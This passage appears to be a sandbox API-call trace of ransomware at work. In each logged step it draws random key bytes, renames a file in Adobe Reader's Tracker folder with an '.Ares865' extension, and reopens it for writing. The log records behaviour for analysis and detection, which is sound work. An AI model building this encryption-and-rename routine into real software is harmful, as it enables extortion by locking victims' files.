(hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.378] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.378] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.379] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.379] lstrcpyW (in: lpString1=0x2cce470, lpString2="end_review.gif" | out: lpString1="end_review.gif") returned="end_review.gif" [0169.379] lstrlenW (lpString="end_review.gif") returned 14 [0169.379] lstrlenW (lpString="Ares865") returned 7 [0169.379] lstrcmpiW (lpString1="iew.gif", lpString2="Ares865") returned 1 [0169.379] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\end_review.gif.Ares865") returned 78 [0169.379] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\end_review.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\end_review.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\end_review.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\end_review.gif.ares865"), dwFlags=0x1) returned 1 [0169.381] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\end_review.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\end_review.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.382] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=900) returned 1 [0169.382] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.383] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.383] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.385] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.386] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.386] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.386] lstrcpyW (in: lpString1=0x2cce470, lpString2="forms_distributed.gif" | out: lpString1="forms_distributed.gif") returned="forms_distributed.gif" [0169.386] lstrlenW (lpString="forms_distributed.gif") returned 21 [0169.386] lstrlenW (lpString="Ares865") returned 7 [0169.386] lstrcmpiW (lpString1="ted.gif", lpString2="Ares865") returned 1 [0169.387] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_distributed.gif.Ares865") returned 85 [0169.387] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_distributed.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_distributed.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_distributed.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_distributed.gif.ares865"), dwFlags=0x1) returned 1 [0169.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_distributed.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_distributed.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.388] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=613) returned 1 [0169.389] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.389] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.389] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.391] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.393] lstrcpyW (in: lpString1=0x2cce470, lpString2="forms_received.gif" | out: lpString1="forms_received.gif") returned="forms_received.gif" [0169.393] lstrlenW (lpString="forms_received.gif") returned 18 [0169.393] lstrlenW (lpString="Ares865") returned 7 [0169.393] lstrcmpiW (lpString1="ved.gif", lpString2="Ares865") returned 1 [0169.393] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_received.gif.Ares865") returned 82 [0169.393] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_received.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_received.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_received.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_received.gif.ares865"), dwFlags=0x1) returned 1 [0169.395] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_received.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_received.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.395] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=615) returned 1 [0169.395] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.396] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.396] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.398] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.399] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.399] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.400] lstrcpyW (in: lpString1=0x2cce470, lpString2="forms_super.gif" | out: lpString1="forms_super.gif") returned="forms_super.gif" [0169.400] lstrlenW (lpString="forms_super.gif") returned 15 [0169.400] lstrlenW (lpString="Ares865") returned 7 [0169.400] lstrcmpiW (lpString1="per.gif", lpString2="Ares865") returned 1 [0169.400] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_super.gif.Ares865") returned 79 [0169.400] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_super.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_super.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_super.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_super.gif.ares865"), dwFlags=0x1) returned 1 [0169.401] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_super.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_super.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.401] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=552) returned 1 [0169.402] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.402] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.402] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.405] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.406] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.406] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.406] lstrcpyW (in: lpString1=0x2cce470, lpString2="form_responses.gif" | out: lpString1="form_responses.gif") returned="form_responses.gif" [0169.406] lstrlenW (lpString="form_responses.gif") returned 18 [0169.406] lstrlenW (lpString="Ares865") returned 7 [0169.407] lstrcmpiW (lpString1="ses.gif", lpString2="Ares865") returned 1 [0169.407] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\form_responses.gif.Ares865") returned 82 [0169.407] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\form_responses.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\form_responses.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\form_responses.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\form_responses.gif.ares865"), dwFlags=0x1) returned 1 [0169.408] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\form_responses.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\form_responses.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.408] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=969) returned 1 [0169.409] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.409] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.409] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.412] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.412] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.412] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.413] lstrcpyW (in: lpString1=0x2cce470, lpString2="info.gif" | out: lpString1="info.gif") returned="info.gif" [0169.413] lstrlenW (lpString="info.gif") returned 8 [0169.413] lstrlenW (lpString="Ares865") returned 7 [0169.413] lstrcmpiW (lpString1="nfo.gif", lpString2="Ares865") returned 1 [0169.413] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\info.gif.Ares865") returned 72 [0169.413] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\info.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\info.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\info.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\info.gif.ares865"), dwFlags=0x1) returned 1 [0169.415] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\info.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\info.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.415] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=578) returned 1 [0169.415] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.416] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.416] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.419] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.419] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.419] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.420] lstrcpyW (in: lpString1=0x2cce470, lpString2="main.css" | out: lpString1="main.css") returned="main.css" [0169.420] lstrlenW (lpString="main.css") returned 8 [0169.420] lstrlenW (lpString="Ares865") returned 7 [0169.420] lstrcmpiW (lpString1="ain.css", lpString2="Ares865") returned -1 [0169.420] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\main.css.Ares865") returned 72 [0169.420] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\main.css" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\main.css"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\main.css.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\main.css.ares865"), dwFlags=0x1) returned 1 [0169.422] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\main.css.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\main.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.422] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11930) returned 1 [0169.422] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.423] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.423] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.426] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.427] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.427] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.427] lstrcpyW (in: lpString1=0x2cce470, lpString2="open_original_form.gif" | out: lpString1="open_original_form.gif") returned="open_original_form.gif" [0169.427] lstrlenW (lpString="open_original_form.gif") returned 22 [0169.427] lstrlenW (lpString="Ares865") returned 7 [0169.427] lstrcmpiW (lpString1="orm.gif", lpString2="Ares865") returned 1 [0169.428] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\open_original_form.gif.Ares865") returned 86 [0169.428] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\open_original_form.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\open_original_form.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\open_original_form.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\open_original_form.gif.ares865"), dwFlags=0x1) returned 1 [0169.431] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\open_original_form.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\open_original_form.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.431] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=806) returned 1 [0169.432] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.432] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.432] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.435] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.435] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.435] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.436] lstrcpyW (in: lpString1=0x2cce470, lpString2="pdf.gif" | out: lpString1="pdf.gif") returned="pdf.gif" [0169.436] lstrlenW (lpString="pdf.gif") returned 7 [0169.436] lstrlenW (lpString="Ares865") returned 7 [0169.436] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\pdf.gif.Ares865") returned 71 [0169.436] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\pdf.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\pdf.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\pdf.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\pdf.gif.ares865"), dwFlags=0x1) returned 1 [0169.438] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\pdf.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\pdf.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.438] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=480) returned 1 [0169.439] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.439] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.439] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.442] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.443] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.443] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.443] lstrcpyW (in: lpString1=0x2cce470, lpString2="reviewers.gif" | out: lpString1="reviewers.gif") returned="reviewers.gif" [0169.443] lstrlenW (lpString="reviewers.gif") returned 13 [0169.443] lstrlenW (lpString="Ares865") returned 7 [0169.443] lstrcmpiW (lpString1="ers.gif", lpString2="Ares865") returned 1 [0169.443] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviewers.gif.Ares865") returned 77 [0169.444] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviewers.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviewers.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviewers.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviewers.gif.ares865"), dwFlags=0x1) returned 1 [0169.445] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviewers.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviewers.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.445] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1452) returned 1 [0169.445] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.446] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.446] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.448] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.449] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.449] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.450] lstrcpyW (in: lpString1=0x2cce470, lpString2="reviews_joined.gif" | out: lpString1="reviews_joined.gif") returned="reviews_joined.gif" [0169.450] lstrlenW (lpString="reviews_joined.gif") returned 18 [0169.450] lstrlenW (lpString="Ares865") returned 7 [0169.450] lstrcmpiW (lpString1="ned.gif", lpString2="Ares865") returned 1 [0169.450] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_joined.gif.Ares865") returned 82 [0169.450] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_joined.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_joined.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_joined.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_joined.gif.ares865"), dwFlags=0x1) returned 1 [0169.451] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_joined.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_joined.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.452] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=914) returned 1 [0169.452] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.452] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.452] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.455] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.455] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.455] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.456] lstrcpyW (in: lpString1=0x2cce470, lpString2="reviews_sent.gif" | out: lpString1="reviews_sent.gif") returned="reviews_sent.gif" [0169.456] lstrlenW (lpString="reviews_sent.gif") returned 16 [0169.456] lstrlenW (lpString="Ares865") returned 7 [0169.456] lstrcmpiW (lpString1="ent.gif", lpString2="Ares865") returned 1 [0169.456] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_sent.gif.Ares865") returned 80 [0169.456] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_sent.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_sent.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_sent.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_sent.gif.ares865"), dwFlags=0x1) returned 1 [0169.458] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_sent.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_sent.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.458] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=909) returned 1 [0169.458] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.459] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.459] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.461] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.462] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 